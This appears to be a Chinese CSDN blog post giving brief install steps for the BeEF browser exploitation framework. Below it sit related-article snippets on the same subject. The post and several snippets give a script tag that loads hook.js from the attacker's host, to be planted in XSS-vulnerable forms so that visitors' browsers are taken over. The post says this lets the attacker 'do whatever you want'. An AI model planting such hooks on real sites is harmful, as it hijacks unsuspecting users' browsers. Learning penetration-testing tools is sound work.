XSS渗透框架Beef的安装和简单使用

最新推荐文章于 2024-06-01 16:36:53 发布
最新推荐文章于 2024-06-01 16:36:53 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: Linux 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21007661/article/details/109851498
版权

BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。

下载beef
https://github.com/beefproject/beef

解压进入beef-master
2020-11-09_20-47.png
输入bundle install进行安装

安装完成后需要打开config.yaml修改帐号密码
2020-11-09_20-47_1.png
修改密码之后启动beef

./beef

在浏览器内输入命令行界面的http://本机ip:3000/ui/authentication访问,在beef登录界面输入beef的用户名和密码登录beef界面

登录后,将<script src='http://IP(运行beef主机的IP):3000/hook.js'></script>插入存在xss漏洞的表单中,然后访问被上马的网页。如图
2020-11-09_20-44.png

回到Manjaro,出现了被攻击的机子,这时你就可以用Commands模块的功能为所欲为了。

uttery
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
beef-xss安装使用
Bu2n的博客
12-07 3311
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
XSS框架安装BEEF
3569
07-18 2644
这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需
XSS另类攻击(四)kali系统beef-xss安装使用
最新发布
06-01 840
本文介绍kali系统beef-xss安装、异常情况解决、使用示例说明。
CentOS安装beEFXSS平台
weixin_30794851的博客
05-18 1418
提到xss平台,大部分人都在用xsser.me的源码搭建,xsser.me源码搭建的平台虽然好用,但是功能不够强大,比如无法和Metasploit配合使用进行更深一步的入侵测试。 这次部署邮件服务器大致分为3个步骤: 安装GEM 安装配置beEF 测试 >>安装GEM 步骤 1 » 安装rvm。导入key curl -sSL https://rvm.io/...
Beef xss神器
weixin_30474613的博客
06-08 280
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址:https://github.com/...
beef工具-01】神器beef安装与简介
m0_64378913的博客
06-01 7334
目录1 beef概述1 beef简介1.2 beef2 beef安装3 beef的重要网址4 简单测试5 总结参考文章 1 beef概述 1 beef简介 BeEF 是浏览器开发框架的缩写。 它是一款专注于网络浏览器的渗透测试工具。 随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器。
渗透测试xss测试语句
07-14
console.log输出语句,不能绕WAF
WEB渗透学习-XSS-labs靶场
04-20
XSS-labs是一个专门针对XSS的学习平台,为网络安全从业者和新手提供了丰富的练习场景,帮助他们深入理解和掌握这种攻击手段。 XSS-labs设计了一套关卡制的学习路径,由浅入深,逐步提高难度。每个关卡都代表一种或...
网络渗透测试 XSS和SQL注入
12-02
在实验环境中,使用了Kali Linux作为渗透测试平台,结合Beef、AWVS和SqlMAP等工具模拟攻击并检测漏洞。Beef是一个扩展性的Web渗透测试框架,AWVS用于自动化扫描Web应用程序的安全漏洞,SqlMAP则是一款自动化的SQL...
django框架防止XSS注入的方法分析
12-26
本文实例讲述了django框架防止XSS注入的方法。分享给大家供大家参考,具体如下: XSS 是常见的跨站脚本攻击,而且这种类型的错误很不容易被发现或者被开发人员忽视,当然django 框架本身是有这方面的考虑的,比如在...
预防XSS攻击和SQL注入XssFilter
05-19
XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin...
《WEB安全渗透测试》(31)BeEF-XSS一款红队XSS神器
午夜安全
09-25 1853
我们知道XSS漏洞分为存储型、反射型、DOM型,最常见的就是利用XSS漏洞弹窗,进一步获取用户Cookie信息。可是如今的WEB系统,有的已经设置HttpOnly属性,有的在请求头中使用Authorization字段提供token令牌,这导致了我们难以获取到用户的身份信息。在这个背景下,XSS漏洞好像越来越没用了。BeEF-XSS是一款非常强大的XSS平台,集成了许多payload,利用它可以极大的提高XSS漏洞的威力。
CentOS7搭建XSS平台
szgyunyun的博客
01-05 1034
我的服务器是CentOS7.8 1、安装php 7 CentOS7的默认PHP版本是PHP5,但是如果我们要安装PHP7,不需要将现有的PHP5删除,只要将PHP升级到PHP7即可。 使用 yum provides php 命令可以获取CentOS7的PHP包安装情况。显示的是在现有的安装源中能够安装的最新版本为:php-5.4.16-46.el7.x86_64 1) 在安装PHP7之前,建议先升级更新一下CentOS7的安装包: yum -y update :升级所有软件包的同时也升级软件和系统内核;
BEEF的搭建与使用
热门推荐
王意林的专栏
07-17 1万+
安装与搭建 beef是ruby写的,在windows下安装beef还是有些麻烦的,需要装很多东西。 源码在github googlecode等地方均有下载 http://code.google.com/p/beef/downloads/list https://github.com/beefproject/beef 在windows下配置ruby,推荐大家使用railsinstal
kali下载beef-xss及利用
qq_53175607的博客
12-15 1695
1.beef-xss下载 使用apt-get update 更新kali(不是管理员用户前面加sudo) apt-get install beef-xss 下载beef(不是管理员用户前面加sudo) 2.利用 启动输入命令beef-xss http://kaliip:3000/ui/panel打开登录页面 构建一个简单xss html页面 <html> <head> <script src='http://kaliip:3000/hook.js'></
在kali环境下安装Beef-Xss靶场搭建
weixin_51525416的博客
09-02 1916
在kali环境下安装Beef-Xss靶场搭建
Beef安装及基本使用
weixin_50341025的博客
04-15 2516
安装beef apt-get update apt-get install beef-xss 配置密码 /etc/beef-xss/config.yaml 默认用户名beef 修改用户名或者密码,注意用户名不需要符号括起来,密码则需要双引号括起来 启动服务 beef-xss 启动后会看见一些生成好的连接 [] Web UI: http://127.0.0.1:3000/ui/panel 管理页面 [] Hook: 样例地址 登录beef控制平台 将代码插入到目标URL,并欺骗被攻击
Beef安装简单使用
abg49988的博客
11-06 2029
安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
Beef-xss安装使用
qq_40624810的博客
12-10 7440
一、背景 BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。 随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。 BeEF
kali如何安装beef-xss
05-14
要在Kali Linux上安装BeEF(The Browser Exploitation Framework),请按照以下步骤进行: 1. 打开终端并更新软件包列表: ``` sudo apt-get update ``` 2. 安装BeEF: ``` sudo apt-get install beef-xss ``` 3. 安装完成后,启动BeEF: ``` sudo beef-xss ``` 4. 在浏览器中打开“http://127.0.0.1:3000/ui/panel”以访问BeEF控制面板。 注意:BeEF是用于演示和教育目的的工具,不应用于非法活动。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值